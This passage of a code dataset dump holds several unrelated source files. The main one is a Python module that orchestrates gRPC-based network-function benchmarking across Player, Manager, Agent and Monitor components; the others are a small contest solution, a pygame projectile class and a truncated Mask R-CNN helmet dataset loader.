enables\n        the tools (probers or listeners) to be loaded\n        from a specific folder\n\n        Arguments:\n            info {dict} -- Contains the folder and the role\n            of the Agent/Monitor that is loading the tools\n\n        Returns:\n            dict -- The set of needed information for the\n            probers or listeners to be loaded into the tools\n            available.\n        \"\"\"\n        folder = info.get(\"folder\")\n        role = info.get(\"role\")\n\n        if role == \"monitor\":\n            prefix = \"listener_\"\n            name = \"listeners\"\n        elif role == \"agent\":\n            prefix = \"prober_\"\n            name = \"probers\"\n        else:\n            prefix = None\n            name = None\n\n        if prefix:\n            tools_cfg = {\n                \"name\": name,\n                \"folder\": folder,\n                \"prefix\": prefix,\n                \"suffix\": \"py\",\n                \"full_path\": True,\n            }\n        else:\n            tools_cfg = {}\n\n        return tools_cfg\n\n    def _update_status(self, tools_cfg):\n        \"\"\"After loading the tools, their information\n        is stored in the artifacts of an Agent/Monitor\n        status (Identity instance)\n\n        Arguments:\n            tools_cfg {dict} -- Contains the name of the\n            tools to be stored in the artifacts,\n            i.e., probers or listeners\n        \"\"\"\n        tools = self.tools.info()\n        artifacts = {\n            tools_cfg.get(\"name\"): list(tools.values()),\n        }\n        self.status.set(\"artifacts\", artifacts)\n\n    async def load_tools(self, info):\n        \"\"\"Loads the tools (probers or listeners)\n        based on the info provided\n\n        Arguments:\n            info {dict} -- Contains the role of the component\n            (agent/monitor) and the folder where the tools are\n            located\n        \"\"\"\n        tools_cfg = self._build_cfg(info)\n\n        if tools_cfg:\n            await self.tools.load(tools_cfg)\n            self._update_status(tools_cfg)\n            logger.info(f\"Loaded {info.get('role')} {tools_cfg.get('name')}\")\n\n        else:\n            logger.info(f\"Tools not loaded: unknown cfgs for {info.get('role')}\")\n\n    def origin(self):\n        \"\"\"Just returns the origin of a snapshot,\n        i.e., the information contained inside a snapshot\n        that references where it was extracted (component uuid and role)\n\n        Returns:\n            dict -- Contains the component uuid and its role\n        \"\"\"\n        profile = self.status.profile()\n        origin = {\n            \"id\": profile.get(\"uuid\"),\n            \"role\": profile.get(\"role\"),\n        }\n        return origin\n\n    def snapshot(self, instruction, results):\n        \"\"\"Builds a Snapshot (gRPC message) based on\n        the results extracted from an Instruction (gRPC service call)\n\n        Arguments:\n            instruction {dict} -- References the information\n            contained in the Instruction message that originated\n            the results and the snapshot\n            results {list} -- Set of evaluations output of\n            tools running the actions contained in the Instruction\n            service call\n\n        Returns:\n            Snapshot -- A gRPC Snapshot message, containing\n            a timestamp, the origin of the snapshot, and its\n            evaluations.\n        \"\"\"\n        logger.info(\"Creating Snapshot\")\n\n        snapshot = Snapshot(id=instruction.get(\"id\"), trial=instruction.get(\"trial\"))\n\n        snap = {\n            \"origin\": self.origin(),\n            \"evaluations\": results,\n            \"timestamp\": datetime.now().strftime(\"%Y-%m-%dT%H:%M:%S.%fZ\"),\n        }\n\n        snapshot = json_format.ParseDict(snap, snapshot)\n        return snapshot\n\n    async def instruction(self, message):\n        \"\"\"This function is called when an Instruction\n        gRPC service call is made to an Agent/Monitor.\n        It executes the Instruction actions using the tools\n        available.\n\n        Arguments:\n            message {Instruction} -- An Instruction gRPC message\n\n        Returns:\n            Snapshot -- A Snapshot gRPC message\n        \"\"\"\n        logger.info(\"Received Instruction\")\n        logger.debug(f\"{json_format.MessageToJson(message)}\")\n\n        instruction = json_format.MessageToDict(\n            message, preserving_proto_field_name=True\n        )\n\n        actions = instruction.get(\"actions\")\n        results = await self.tools.handle(actions)\n        snapshot = self.snapshot(instruction, results)\n\n        logger.info(f\"Replying Snapshot\")\n        logger.debug(f\"{json_format.MessageToJson(snapshot)}\")\n        return snapshot\n\n\nclass ManagerCore(Core):\n    def __init__(self, info):\n        Core.__init__(self, info)\n        self.instructions_ids = 1001\n\n    def actions(self, instruction, req_tools):\n        \"\"\"Builds the set of actions inside an instruction\n        based on the tool id and parameters inside req_tools\n\n        Arguments:\n            instruction {Instruction} -- A gRPC message Instruction\n            req_tools {list} -- List of tools (id, parameters, sched)\n        \"\"\"\n        logger.info(f\"Building actions\")\n        logger.debug(f\"Tools: {req_tools}\")\n\n        for tool in req_tools:\n            action = instruction.actions.add()\n            action.id = tool.id\n            action.name = tool.name\n            action.instance = tool.instance\n\n            for k in tool.parameters:\n                action.args[k] = tool.parameters[k]\n\n            
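# (added note) the schedule is copied verbatim, so whatever timing\n            # fields the requested tool carries are preserved on the Action.\n            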
action.sched.CopyFrom(tool.sched)\n\n    def instruction(self, req_peer, tools_type):\n        \"\"\"Builds a gRPC message of type Instruction\n        containing the actions for a specific peer uuid (req_peer)\n        defined in the probers/listeners allocated to this peer\n\n        Arguments:\n            req_peer {dict} -- Contains a uuid and definitions of\n            tools (probers or listeners) with parameters and values\n            that will be used to compose an Instruction\n            tools_type {string} -- Defines the types of tools that\n            the req_peer must contain (probers or listeners)\n\n        Returns:\n            tuple -- (Instruction, bool) A gRPC message of type\n            Instruction and a bool indicating if the instruction was\n            successfully built or not\n        \"\"\"\n        instruction_built = False\n        instruction = Instruction()\n\n        if hasattr(req_peer, tools_type):\n            req_tools = getattr(req_peer, tools_type, [])\n\n            if req_tools:\n                self.actions(instruction, req_tools)\n                instruction_built = True\n\n        return instruction, instruction_built\n\n    def build_instructions(self, requested, tools_type):\n        \"\"\"Builds a set of instructions for a particular set\n        of peers (agents or monitors) and its tools_type (probers or listeners)\n\n        Arguments:\n            requested {list} -- Set of requests for particular peer uuids\n            and their tools needed to build an Instruction\n            tools_type {string} -- Defines if the tools type is probers or listeners\n\n        Returns:\n            tuple -- (dict, bool) A dict containing all the (indexed by uuid) set of\n            Instructions (gRPC messages), and a bool defining if all those instructions\n            that were requested were fulfilled\n        \"\"\"\n        instructions, instructions_built = {}, {}\n\n        for req_peer in requested:\n            instruction, instruction_built = self.instruction(req_peer, tools_type)\n\n            req_uuid = getattr(req_peer, \"uuid\")\n\n            if instruction_built:\n                instructions_built[req_uuid] = True\n                instructions[req_uuid] = instruction\n                logger.info(f\"Instruction built for uuid {req_uuid}\")\n\n            else:\n                instructions_built[req_uuid] = False\n                logger.info(\n                    f\"Instruction not built for uuid {req_uuid} - \"\n                    f\"Could not get tools type {tools_type}\"\n                )\n\n        logger.debug(f\"Status of instructions per requested uuid: {instructions_built}\")\n        all_instructions_ok = all(instructions_built.values())\n\n        return instructions, all_instructions_ok\n\n    def check_uuids(self, locals, requested):\n        \"\"\"Verifies if (requested) workers (agents/monitors)\n        fit available components (locals)\n\n        Arguments:\n            locals {list} -- Set of available peer profiles of\n            Agents and/or Monitors to which the instructions\n            will be sent when built\n            requested {list} -- Set of requested instructions to be\n            built for particular Agents/Monitors\n\n        Returns:\n            bool -- If all uuids requested to build instructions\n            match the available peers that Manager has to send\n            those instructions\n        \"\"\"\n        logger.debug(\n            \"Verifying if (requested) workers (agents/monitors) \"\n            \"fit available components (locals)\"\n        )\n\n        local_ids = [peer_uuid for peer_uuid in locals]\n        req_ids = [req.uuid for req in requested]\n\n        for req_id in req_ids:\n            if req_id not in local_ids:\n                logger.debug(\n                    f\"Failed to check uuids - \"\n                    f\"Component requested uuid {req_id} \"\n                    f\"missing in peer uuids: {local_ids}\"\n                )\n\n                return False\n\n        logger.debug(\"All uuids checked - requested match available uuids\")\n        return True\n\n    def instructions(self, locals, requested, role):\n        \"\"\"Builds the instructions for a particular\n        role, considering the available locals (peers),\n        Agents/Monitors available to execute the instructions,\n        and the requested ones\n\n        
Arguments:\n            locals {list} -- Set of available peer profiles of\n            Agents and/or Monitors to which the instructions\n            will be sent when built\n            requested {list} -- Set of requested instructions to be\n            built for particular Agents/Monitors\n            role {string} -- Role of the components for which the instructions\n            will be built\n\n        Returns:\n            tuple -- (dict, bool) Set of instructions built and\n            if all instructions were built correctly\n        \"\"\"\n        logger.info(f\"Building instructions for {role}\")\n\n        instructions, all_instructions_ok = {}, False\n\n        tools_name = {\"agents\": \"probers\", \"monitors\": \"listeners\"}\n        tools_type = tools_name.get(role, None)\n\n        if tools_type:\n            if self.check_uuids(locals, requested):\n                instructions, all_instructions_ok = self.build_instructions(\n                    requested, tools_type\n                )\n\n        if all_instructions_ok:\n            logger.info(f\"All instructions built for {role}\")\n        else:\n            logger.info(f\"Not all instructions built for {role}\")\n\n        return instructions, all_instructions_ok\n\n    async def call_peer(self, role, address, instruction):\n        \"\"\"Performs the call of an instruction in an agent/monitor\n        peer.\n\n        Arguments:\n            role {string} -- The role of the peer being called\n            (i.e., agent or monitor)\n            address {string} -- The address (ip:port) of the peer\n            being called\n            instruction {Instruction} -- A gRPC message of type Instruction\n\n        Returns:\n            Snapshot -- A gRPC message of type Snapshot,\n            if no exceptions are raised because of a grpc error\n            or os error\n        \"\"\"\n        reply = Snapshot(id=instruction.id)\n\n        host, port = address.split(\":\")\n        channel = Channel(host, port)\n\n        if role == \"agent\":\n            stub = AgentStub(channel)\n        elif role == \"monitor\":\n            stub = MonitorStub(channel)\n        else:\n            stub = None\n            logger.info(f\"Could not contact role {role} - no stub/client available\")\n            raise (Exception(f\"No stub/client available for {role}\"))\n\n        try:\n            reply = await stub.CallInstruction(instruction)\n\n        except GRPCError as e:\n            logger.info(f\"Error in instruction call at {address}\")\n            logger.debug(f\"Exception: {repr(e)}\")\n            raise (e)\n\n        except OSError as e:\n            logger.info(f\"Could not open channel for instruction call at {address}\")\n            logger.debug(f\"Exception: {repr(e)}\")\n            raise (e)\n\n        channel.close()\n        return reply\n\n    async def call_instructions(self, instructions, peers):\n        \"\"\"Schedules and calls all the instructions in the proper\n        set of peers.\n        Since an Instruction might trigger an exception, not every\n        snapshot comes from a successful execution: failed calls are\n        returned as error snapshots instead.\n\n        Arguments:\n            instructions {dict} -- Set of instructions (indexed by the peer uuid\n            where it must be called) to be executed on remote peers\n            peers {dict} -- Set of peers where instructions must be executed\n\n        Returns:\n            list -- Set of snapshots obtained from the execution of\n            instructions\n        \"\"\"\n        logger.info(f\"Calling instructions\")\n        snapshots = []\n        coros = []\n\n        for uuid, instruction in instructions.items():\n            peer = peers.get(uuid)\n            role = peer.get(\"role\")\n            address = peer.get(\"address\")\n            logger.info(\n                f\"Scheduled instruction call on: {role} uuid {uuid} at {address}\"\n            )\n\n            aw = self.call_peer(role, address, instruction)\n            coros.append(aw)\n\n        logger.info(f\"Calling all instructions\")\n        snaps = await asyncio.gather(*coros, return_exceptions=True)\n        peer_uuids = list(instructions.keys())\n\n        logger.info(f\"Validating snapshots\")\n        for snap in snaps:\n            snap_index = snaps.index(snap)\n            uuid = peer_uuids[snap_index]\n\n            if isinstance(snap, Exception):\n                instruction = instructions[uuid]\n                logger.info(f\"Snapshot fail from uuid {uuid}\")\n                logger.debug(f\"Exception: {repr(snap)}\")\n                logger.debug(f\"Instruction: {instruction}\")\n\n                snapshot_err = Snapshot(\n                    id=instruction.id, trial=instruction.trial, error=repr(snap)\n                )\n                snapshots.append(snapshot_err)\n            else:\n                logger.info(f\"Snapshot ok from uuid {uuid}\")\n                snapshots.append(snap)\n\n        return snapshots\n\n    async def trial(self, trial, instructions, peers):\n        \"\"\"Runs a single trial - calls all the instructions\n        needed for a trial on the particular peers\n\n        Arguments:\n            trial {int} -- Number of the trial being executed\n            instructions {dict} -- Set of instructions to be called\n            peers {dict} -- Set of peers that instructions will be called on,\n            indexed by uuid\n\n        Returns:\n            tuple -- (list, bool) A list of Snapshots obtained from\n            running the instructions, and a bool indicating if all\n            the snapshots were obtained from the instructions called\n        \"\"\"\n\n        instruction_ids = []\n\n        for instruction in instructions.values():\n            instruction.id = self.instructions_ids\n            instruction.trial = trial\n            instruction_ids.append(self.instructions_ids)\n            self.instructions_ids += 1\n\n        trial_snapshots = await self.call_instructions(instructions, peers)\n\n        snap_ids = [snap.id for snap in trial_snapshots]\n        snaps_ack = [\n            True if inst_id in snap_ids else False for inst_id in instruction_ids\n        ]\n        snaps_status = all(snaps_ack)\n\n        return trial_snapshots, snaps_status\n\n    async def trials(self, trials, instructions, peers):\n        \"\"\"Runs all the trials needed for a set of instructions\n        in the selected peers\n\n        Arguments:\n            trials {int} -- Amount of trials to be run\n            instructions {dict} -- Set of instructions to be\n            sent for each peer, indexed by the peer uuid\n            peers {dict} -- Set of peer identities indexed\n            by uuid, to which the instructions are sent\n\n        Returns:\n            list -- Set of snapshots obtained from running\n            each trial, and its instructions\n        \"\"\"\n        snapshots = []\n\n        for trial in range(1, trials + 1):\n            logger.info(f\"Trial: {trial} of total {trials}\")\n\n            trial_snapshots, snaps_status = await self.trial(trial, instructions, peers)\n\n            if snaps_status:\n                logger.info(f\"All instructions successful in trial {trial}\")\n            else:\n                logger.info(f\"Failed instructions in trial {trial}\")\n\n            snapshots.extend(trial_snapshots)\n\n        logger.info(f\"Finished trials: {trials}\")\n        return snapshots\n\n    def report(self, report, 
snapshots):\n \"\"\"Adds a set of snapshots into a report\n\n Arguments:\n report {Report} -- A gRPC message of type Report\n snapshots {list} -- A set of gRPC messages of type\n Snapshot\n \"\"\"\n logger.info(f\"Building report {report.id} in test {report.test}\")\n\n for snap in snapshots:\n logger.info(f\"Parsing snapshot id {snap.id} into report\")\n report_snap = report.snapshots.get_or_create(snap.id)\n report_snap.CopyFrom(snap)\n\n async def task(self, task):\n \"\"\"Function called when a task gRPC service call\n is performed in the Manager component.\n It performs all the lifecycle of a task, i.e.,\n calls all the trials to run instructions in Agents/Monitors\n And then builds a Report containing all the Snapshots obtained\n\n Arguments:\n task {Task} -- A gRPC message type Task\n\n Returns:\n Snaphot -- A gRPC message type Snapshot\n \"\"\"\n logger.info(\"Received Task\")\n logger.debug(f\"{json_format.MessageToJson(task)}\")\n\n report = Report(id=task.id, test=task.test)\n\n agents_peers = self.status.get_peers(\"role\", \"agent\")\n monitors_peers = self.status.get_peers(\"role\", \"monitor\")\n\n agents_instructions, ai_ok = self.instructions(\n agents_peers, task.agents, \"agents\"\n )\n monitors_instructions, mi_ok = self.instructions(\n monitors_peers, task.monitors, \"monitors\"\n )\n\n if ai_ok and mi_ok:\n trials = task.trials\n logger.info(f\"Executing trials for task {task.id} - trials {trials}\")\n peers = {**agents_peers, **monitors_peers}\n instructions = {**agents_instructions, **monitors_instructions}\n snapshots = await self.trials(trials, instructions, peers)\n self.report(report, snapshots)\n else:\n logger.info(\n f\"Test not executed - instructions not ok for agents {ai_ok} and/or monitors {mi_ok}\"\n )\n logger.info(\n f\"Could not build report for task {task.id} in test {task.test}\"\n )\n\n logger.info(\"Replying Report\")\n report.timestamp.FromDatetime(datetime.now())\n logger.debug(f\"{json_format.MessageToJson(report)}\")\n return report\n\n\nclass PlayerCore(Core):\n def __init__(self, info):\n Core.__init__(self, info)\n\n async def updateGreetings(self, info_str, vnfbd):\n \"\"\"Calls the greet method from the base Core class\n to be used when a new scenario is deployed, so Player\n can contact the Manager component deployed and collects\n its information: apparatus with set of Agents/Monitors info\n\n Arguments:\n info_str {string} -- A JSON string containing all the\n encoded management info of interfaces of Manager/Agents/Monitors\n that must execute peering and retrieve info\n vnfbd {VNFBD} -- A VNFBD object instance that establishes\n the contacts proper definition of interfaces that must\n be reached (i.e., default port numbers)\n \"\"\"\n logger.info(f\"Greetings to deployed scenario contacts\")\n info = json.loads(info_str)\n\n if info:\n contacts = vnfbd.contacts(info)\n else:\n contacts = []\n\n logger.debug(f\"Contacts: {contacts}\")\n\n if contacts:\n greet_info = {\n \"contacts\": contacts,\n \"peers\": contacts,\n }\n await self.greet(greet_info)\n else:\n logger.info(f\"No contacts for greetings in scenario deployed\")\n logger.debug(f\"{info}\")\n\n async def call_scenario(self, command, test, vnfbd):\n \"\"\"Calls a scenario deployment in the gym-infra component\n\n Arguments:\n command {string} -- Defines if the scenario being\n called must be in mode start or stop\n test {int} -- The number of the test case that identifies\n that scenario deployment\n vnfbd {VNFBD} -- A VNFBD object instance from which\n the scenario will be 
extracted to be deployed\n\n        Returns:\n            bool -- If the scenario was deployed correctly/successfully\n            or not\n        \"\"\"\n        logger.info(f\"Calling test {test} scenario - {command}\")\n\n        environment = vnfbd.environment()\n        env_orchestrator = environment.get(\"orchestrator\")\n        env_params = env_orchestrator.get(\"parameters\")\n        address = env_params.get(\"address\").get(\"value\")\n        host, port = address.split(\":\")\n\n        deploy_dict = {\n            \"id\": test,\n            \"workflow\": command,\n            \"scenario\": vnfbd.scenario(),\n            \"environment\": environment,\n        }\n        deploy = json_format.ParseDict(deploy_dict, Deploy())\n\n        # create the channel outside the try block so the finally\n        # clause can always close it, even if the stub call fails early\n        channel = Channel(host, port)\n\n        try:\n            stub = InfraStub(channel)\n            built = await stub.Run(deploy)\n\n        except GRPCError as e:\n            logger.info(f\"Error in scenario deployment\")\n            logger.debug(f\"{e}\")\n            ack = False\n\n        except OSError as e:\n            logger.info(f\"Error in channel for scenario deployment\")\n            logger.debug(f\"{e}\")\n            ack = False\n\n        else:\n            if built.error:\n                ack = False\n                logger.info(f\"Scenario deployed error: {built.error}\")\n            else:\n                ack = True\n                logger.info(f\"Scenario deployed: {built.ack}\")\n\n                info = built.info\n                info = info.decode(\"utf-8\")\n                await self.updateGreetings(info, vnfbd)\n        finally:\n            channel.close()\n\n        return ack\n\n    async def call_task(self, uuid, task):\n        \"\"\"Calls a task in a Manager component\n        using a gRPC stub\n\n        Arguments:\n            uuid {string} -- The uuid of a Manager component\n            that is a peer of Player and by whom the Task will\n            be executed\n            task {Task} -- A gRPC message of type Task that\n            the Manager component being called will have to\n            execute\n\n        Returns:\n            dict -- All the information of a Report message\n            obtained from a Manager component after running\n            the called Task message\n        \"\"\"\n        logger.info(f\"Calling test task at manager uuid {uuid}\")\n        logger.debug(f\"{json_format.MessageToJson(task)}\")\n\n        peers = self.status.get_peers(\"role\", \"manager\")\n        peer = peers.get(uuid)\n        address = peer.get(\"address\")\n        host, port = address.split(\":\")\n        channel = Channel(host, port)\n\n        report_msg = Report(id=task.id, test=task.test)\n\n        try:\n            stub = ManagerStub(channel)\n            report_msg = await stub.CallTask(task)\n\n        except GRPCError as e:\n            logger.info(f\"Error in task call\")\n            logger.debug(f\"{repr(e)}\")\n            report_msg = Report(id=task.id, test=task.test, error=repr(e))\n\n        except OSError as e:\n            logger.info(f\"Error in channel for task call\")\n            logger.debug(f\"{repr(e)}\")\n            report_msg = Report(id=task.id, test=task.test, error=repr(e))\n\n        else:\n            logger.debug(f\"Report received\")\n\n        finally:\n            logger.debug(f\"{json_format.MessageToJson(report_msg)}\")\n            report = json_format.MessageToDict(report_msg)\n            channel.close()\n\n        return report\n\n    def task_template(self, vnfbd):\n        \"\"\"Build a vnfbd task template,\n        i.e., selects a particular manager (uuid)\n        that satisfies all the proceedings (agents/probers\n        and/or monitors/listeners) contained in a\n        vnfbd instance that will compose a Task message\n        to be sent to that selected Manager.\n\n        Arguments:\n            vnfbd {VNFBD} -- A VNFBD object instance\n\n        Returns:\n            tuple -- (string, dict) The string uuid of the\n            manager component where the task template must be\n            executed/called and the dict containing the task\n            template that will compose a Task message\n        \"\"\"\n        logger.info(\"Building vnfbd task templates\")\n        uuid, task_template = None, None\n        managers_peers = self.status.get_peers(\"role\", \"manager\")\n\n        for manager_uuid, manager in managers_peers.items():\n            apparatus = manager.get(\"apparatus\")\n            
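# build_task(apparatus) is expected to return a filled task template dict\n            # only when this manager's apparatus covers every prober/listener that\n            # the vnf-bd instance requires, and a falsy value otherwise\n            # (assumption inferred from the truthiness check below)\n            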
vnfbd_task_template = vnfbd.build_task(apparatus)\n\n            if vnfbd_task_template:\n                logger.info(\n                    f\"Instance of vnf-bd satisfied by manager uuid {manager_uuid} apparatus\"\n                )\n                return manager_uuid, vnfbd_task_template\n\n        logger.info(f\"Instance of vnf-bd not satisfied\")\n        return uuid, task_template\n\n    async def task(self, test, trials, vnfbd):\n        \"\"\"Run a vnfbd task for a particular test\n\n        Arguments:\n            test {int} -- Number of the test case\n            trials {int} -- Number of trials that a test case\n            must be executed by a Manager component\n            vnfbd {VNFBD} -- A VNFBD object instance from which the\n            task was generated\n\n        Returns:\n            dict -- A report dictionary, containing all the\n            (possible) snapshots obtained from the execution of the\n            vnfbd task\n        \"\"\"\n        uuid, task_template = self.task_template(vnfbd)\n\n        if uuid and task_template:\n            logger.info(f\"Building task for test {test} with {trials} trials\")\n\n            task = Task(id=test, test=test, trials=trials)\n\n            logger.debug(f\"Parsing task template: {task_template}\")\n\n            task = json_format.ParseDict(task_template, task)\n            report = await self.call_task(uuid, task)\n\n        else:\n            logger.info(\n                f\"Failed to build task for test {test} - no manager apparatus available\"\n            )\n            report = {\n                \"id\": test,\n                \"test\": test,\n                \"error\": f\"Failed to build task for test {test} - no manager apparatus available\",\n            }\n\n        return report\n\n    async def scenario(self, test, vnfbd_instance, previous_deployment, action):\n        \"\"\"Handles the deployment of a scenario for a specific instance\n        of a vnfbd, in a particular test case\n\n        Arguments:\n            test {int} -- The number of the test\n            vnfbd_instance {VNFBD} -- A VNFBD object instance\n            previous_deployment {bool} -- If a previous deployment exists\n            or not\n            action {string} -- The action (start or stop) to be taken for\n            a given scenario\n\n        Returns:\n            bool -- If the needed vnfbd scenario action was confirmed or not\n        \"\"\"\n\n        if action == \"start\":\n            if previous_deployment:\n                ok = await self.call_scenario(\"stop\", test, vnfbd_instance)\n                logger.info(f\"Stopped previous test {test} deployment scenario: {ok}\")\n\n            if vnfbd_instance.deploy():\n                vnfbd_deployed = await self.call_scenario(\"start\", test, vnfbd_instance)\n                logger.info(\n                    f\"Started test {test} deployment scenario: {vnfbd_deployed}\"\n                )\n            else:\n                vnfbd_deployed = True\n\n        elif action == \"stop\":\n            ok = await self.call_scenario(\"stop\", test, vnfbd_instance)\n            logger.info(f\"Stopped test {test} deployment scenario: {ok}\")\n            vnfbd_deployed = ok\n\n        else:\n            logger.info(\n                f\"No action in [start or stop] for test {test} deployment scenario\"\n            )\n            vnfbd_deployed = False\n\n        return vnfbd_deployed\n\n    async def tests(self, vnfbd_instance):\n        \"\"\"Executes all the vnfbd instance tests\n        Each test requires a scenario deployment\n        and the call of all its tasks\n\n        Arguments:\n            vnfbd_instance {VNFBD} -- A VNFBD object instance\n\n        Returns:\n            tuple -- (list, bool) A list of reports output of the\n            tasks created from the vnfbd instance, and a bool indicating\n            if all the tasks were performed successfully\n        \"\"\"\n\n        tests = vnfbd_instance.tests()\n        trials = vnfbd_instance.trials()\n        reports_ok = {}\n        reports = []\n        vnfbd_deployed = False\n\n        logger.info(f\"Starting vnf-bd instance tests {tests} - trials {trials}\")\n\n        for test in range(1, tests + 1):\n            logger.info(\n                f\"Starting test {test} out of {tests} in total - trials {trials}\"\n            )\n            reports_ok[test] = False\n\n            vnfbd_deployed = await self.scenario(\n                test, vnfbd_instance, vnfbd_deployed,
action=\"start\"\n            )\n            if vnfbd_deployed:\n\n                report = await self.task(test, trials, vnfbd_instance)\n                if report:\n                    logger.info(f\"Received report in test {test}\")\n                    reports.append(report)\n                    reports_ok[test] = True\n                else:\n                    logger.info(f\"Failed report in test {test}\")\n\n            else:\n                logger.info(f\"Deployment of vnf-bd instance failed in test {test}\")\n\n        vnfbd_not_deployed = await self.scenario(\n            test, vnfbd_instance, vnfbd_deployed, action=\"stop\"\n        )\n        logger.info(f\"Stopped deployment of vnfbd scenario: {vnfbd_not_deployed}\")\n\n        logger.debug(f\"Status tests reports: {reports_ok}\")\n        all_reports_ok = all(reports_ok.values())\n\n        logger.info(f\"Ending vnf-bd instance tests - all reports ok: {all_reports_ok}\")\n        return reports, all_reports_ok\n\n    async def vnfbd(self, vnfbd):\n        \"\"\"Executes all the possible instances of\n        a vnfbd. Each instance is obtained from the\n        possible multiplexing of inputs for a vnfbd\n\n        Arguments:\n            vnfbd {VNFBD} -- A VNFBD object instance\n\n        Returns:\n            list -- A set of reports obtained from the\n            execution of the tests of vnfbd instances\n        \"\"\"\n        logger.info(\"Starting vnf-bd instance execution\")\n        all_reports = []\n\n        reports, ack = await self.tests(vnfbd)\n\n        if not ack:\n            logger.info(f\"Error in vnf-bd instance - missing reports\")\n        else:\n            all_reports.extend(reports)\n\n        logger.info(\"Finishing vnf-bd instance execution\")\n        return all_reports\n\n    def vnfpp(self, reports):\n        \"\"\"From the set of reports obtained\n        from the tasks generated and executed based\n        on a VNF-BD, creates a VNF-PP\n\n        Arguments:\n            reports {list} -- A list of reports, output\n            of the tasks generated from the execution of\n            the vnfbd\n\n        Returns:\n            VNFPP -- A VNFPP object instance containing\n            all the reports and the headers obtained from the\n            vnfbd.\n        \"\"\"\n        vnfpp = VNFPP()\n        vnfpp.load_reports(reports)\n        return vnfpp\n\n    async def vnfbr(self, vnfbr):\n\n        for vnfbd in vnfbr.instances():\n            reports = await self.vnfbd(vnfbd)\n            vnfpp = self.vnfpp(reports)\n            vnfbr.add_output(vnfbd, vnfpp)\n\n    async def layout(self, message):\n        \"\"\"Called when a Player receives a gRPC service call\n        of Layout type.
It means it must run the VNF-BD inside\n the Layout and return a Result type of gRPC message\n\n Arguments:\n message {Layout} -- A gRPC message of type Layout\n containing a VNF-BR, the inputs part of it\n\n Returns:\n Result -- A gRPC message of type Result.\n It contains the obtained VNF-BR outputs\n \"\"\"\n logger.info(\"Received Layout\")\n logger.debug(f\"{json_format.MessageToJson(message)}\")\n\n result = Result(id=message.id)\n result.timestamp.FromDatetime(datetime.now())\n\n vnfbr_model = message.vnfbr\n\n vnfbr = VNFBR()\n init_ok = vnfbr.from_protobuf(vnfbr_model)\n\n if init_ok:\n logger.info(\"Init vnfbr successful\")\n await self.vnfbr(vnfbr)\n vnfbr.build()\n vnfbr_protobuf = vnfbr.protobuf()\n result.vnfbr.CopyFrom(vnfbr_protobuf)\n result.timestamp.FromDatetime(datetime.now())\n\n else:\n logger.info(\"Could not init vnfbr - empty result\")\n\n logger.info(\"Replying Result\")\n logger.debug(f\"{json_format.MessageToJson(result)}\")\n return result\n","sub_path":"gym/common/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":40467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"374427362","text":"N = int(input())\ns = sorted([int(input()) for _ in range(N)])\n\nall_10 = True\nfor i in range(N):\n if s[i] % 10 != 0:\n all_10 = False\n\nif all_10:\n print(0)\n exit()\n\nsum_s = sum(s)\n\nif sum_s % 10 != 0:\n print(sum_s)\nelse:\n for i in range(N):\n if s[i] % 10 != 0:\n print(sum_s - s[i])\n break\n","sub_path":"Python_codes/p03699/s067517736.py","file_name":"s067517736.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"614138143","text":"from pygame import *\r\nfrom pyganim import *\r\nimport entity\r\nfrom math import cos, sin\r\n\r\nclass Throwable(entity.Entity):\r\n\t# Any throwable stuff\r\n\t# This class should be extended (and will be), adapted to every specif object\r\n\t# in which it belogs, like granades, tomahawks, knifes, etc.\r\n\t\"\"\"docstring for Throwable\"\"\"\r\n\tdef __init__(self, x, y, speed, weight, angle, image):\r\n\t\tentity.Entity.__init__(self, x, y, image)\r\n\r\n\t\t# In fact, this isn't a 'weight' value, is just that heavier objects should \r\n\t\t# travel less distances. 
So I put this as a value indicating the 'falling speed', or else.\r\n\t\tself.damping = 0.5 # Floor friction\r\n\t\tself.weight = weight\r\n\t\tself.hVelocity = speed*cos(angle) # Horizontal velocity\r\n\t\tself.vVelocity = speed*sin(angle) # Vertical velocity\r\n\t\t#self.vVelocity *= -1 # Up direction\r\n\r\n\t\tself.ghostRect = (self.rect.centerx - self.hVelocity, self.rect.centery + self.vVelocity)\r\n\t\tself.nextMovement = False\r\n\r\n\tdef motion(self, floorGroup):\r\n\t\tself.move(-self.hVelocity, self.vVelocity)\r\n\t\tself.vVelocity += self.weight\r\n\t\tfor eachfloor in floorGroup:\r\n\t\t\tif sprite.collide_rect(self, eachfloor):\r\n\t\t\t\tself.vVelocity *= -0.85\r\n\t\t\t\tself.hVelocity *= self.damping\r\n\t\t","sub_path":"throwable.py","file_name":"throwable.py","file_ext":"py","file_size_in_byte":1199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"209174984","text":"from os import listdir\nfrom xml.etree import ElementTree\nfrom numpy import zeros\nfrom numpy import asarray\nfrom mrcnn.utils import Dataset\nfrom matplotlib import pyplot\nfrom mrcnn.model import MaskRCNN\n\n\n# 定义并加载安全帽数据集的类\nclass HelmetDataset(Dataset):\n # 加载数据集定义\n def load_dataset(self, dataset_dir, is_train=True):\n # 定义一个类\n self.add_class(\"dataset\", 1, \"Helmet\")\n # 定义数据所在位置\n images_dir = dataset_dir + '/JPEGImages/'\n annotations_dir = dataset_dir + '/Annotations/'\n # 定位到所有图像\n for filename in listdir(images_dir):\n # 提取图像 id\n image_id = filename[:-4]\n # 如果我们正在建立的是训练集,略过 350 序号之后的所有图像\n if is_train and int(image_id) >= 350:\n continue\n # 如果我们正在建立的是测试/验证集,略过 350 序号之前的所有图像\n if not is_train and int(image_id) < 350:\n continue\n if int(image_id) >= 500:\n continue\n img_path = images_dir + filename\n ann_path = annotations_dir + image_id + '.xml'\n # 添加到数据集\n self.add_image('dataset', image_id=image_id, path=img_path, annotation=ann_path)\n\n # 从注解文件中提取边框值\n def get_position(self, filename):\n # 加载并解析文件\n tree = ElementTree.parse(filename)\n # 获取文档根元素\n root = tree.getroot()\n # 提取出每个 bounding box 元素\n boxes = list()\n for box in root.findall('.//bndbox'):\n xmin = int(box.find('xmin').text)\n ymin = int(box.find('ymin').text)\n xmax = int(box.find('xmax').text)\n ymax = int(box.find('ymax').text)\n coors = [xmin, ymin, xmax, ymax]\n boxes.append(coors)\n # 提取出图像尺寸\n width = int(root.find('.//size/width').text)\n height = int(root.find('.//size/height').text)\n return boxes, width, height\n\n # 加载图像掩膜\n def load_mask(self, image_id):\n # 获取图像详细信息\n info = 